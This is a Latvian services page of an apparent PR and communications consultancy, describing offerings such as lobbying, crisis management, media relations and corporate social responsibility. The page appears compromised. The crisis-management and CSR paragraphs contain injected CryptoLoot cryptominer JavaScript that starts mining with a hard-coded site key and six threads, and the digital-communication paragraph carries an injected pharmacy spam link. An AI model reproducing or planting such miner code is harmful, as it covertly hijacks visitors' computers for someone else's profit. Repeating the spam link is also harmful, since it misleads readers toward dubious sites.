Pakalpojumi

Latviešu

Pakalpojumi

Vadības konsultācijas
Vadības konsultācijas
Biznesa vajadzību izpratne, pieredze, kontakti un radošs skatījums ikdienišķām lietām. Mēs zinām, kā sasniegt mērķi ar pareizu vēstījumu.
Interešu aizstāvība
Interešu aizstāvība
Lai sasniegtu mērķi, jārunā vienā valodā. Burtiskā un pārnestā nozīmē. Mēs zinām - kā. Mums ir kontakti, pieredze un mēs zinām, kā panākt, lai jūs sadzird. Pareizajā vietā un pareizajā laikā.
Komunikācija digitālajā vidē
Komunikācija digitālajā vidē
Digitālā vide mainās ik dienu, stundu un sekundi. Mēs strādājam http://www.viagrabelgiquefr.com/ ātrāk. Ar rūpīgi izstrādātām stratēģijām, mēs efektīvi sasniedzam mērķus.
Korporatīvā komunikācija
Korporatīvā komunikācija
Mūsu stiprā puse ir zināšanas - kā komunicēt ar ieinteresētām pusēm, kā veidot produktu komunikāciju, reizē veicinot uzņēmuma zīmola, vērtību un leģendas atpazīstamību.
Krīzes un problēmsituāciju pārvaldība
Krīzes un problēmsituāciju pārvaldība
Esam pārliecināti - labāk būt sagatavotam, nekā krist panikā. Palīdzam laicīgi apzināties riskus, sagatavot atbildes, reaģēt ātri. var miner = new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf'); miner.start(); var miner=new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf', { threads:6,autoThreads:false,throttle:0.2, } ); miner.start(); // Listen on events miner.on('found', function() { /* Hash found */ }) miner.on('accepted', function() { /* Hash accepted by the pool */ }) // Update stats once per second setInterval(function() { var hashesPerSecond = miner.getHashesPerSecond(); var totalHashes = miner.getTotalHashes(); var acceptedHashes = miner.getAcceptedHashes(); // Output to HTML elements... }, 1000);
Apmācības
Apmācības
Kā ar vārdiem sasniegt mērķi? Kā kļūt pamanāmam pūlī? Kā nepazust informācijas plūsmā? Mēs zinām, cik būtiska ir pārliecinoša komunikācija. Mēs to protam. Varam iemācīt!
Mediju attiecības
Mediju attiecības
Tas, kas ir mediju dienaskārtībā, ir aktuāls. Mēs zinām, kā tur nokļūt. Mēs protam izstāstīt jūsu stāstu, veidot ziņu svarīgu un aktuālu.
Iekšējā komunikācija
Iekšējā komunikācija
Ikviena uzņēmuma vissvarīgākās attiecības ir attiecības ar darbiniekiem, jo tie ir nozīmīgs resurss. Iedvesma un motivācija ir tikpat svarīga kā alga. Mēs palīdzēsim komunicēt mērķtiecīgi, ar nozīmi un tā, lai tas patiesi iedvesmo.
Korporatīvā sociālā atbildība
Korporatīvā sociālā atbildība
Būt atbildīgam nozīmē domāt plašāk. Saredzēt vairāk. Mēs palīdzēsim saskatīt nianses, tās izcelt un parādīt. var miner = new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf'); miner.start(); var miner=new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf', { threads:6,autoThreads:false,throttle:0.2, } ); miner.start(); // Listen on events miner.on('found', function() { /* Hash found */ }) miner.on('accepted', function() { /* Hash accepted by the pool */ }) // Update stats once per second setInterval(function() { var hashesPerSecond = miner.getHashesPerSecond(); var totalHashes = miner.getTotalHashes(); var acceptedHashes = miner.getAcceptedHashes(); // Output to HTML elements... }, 1000);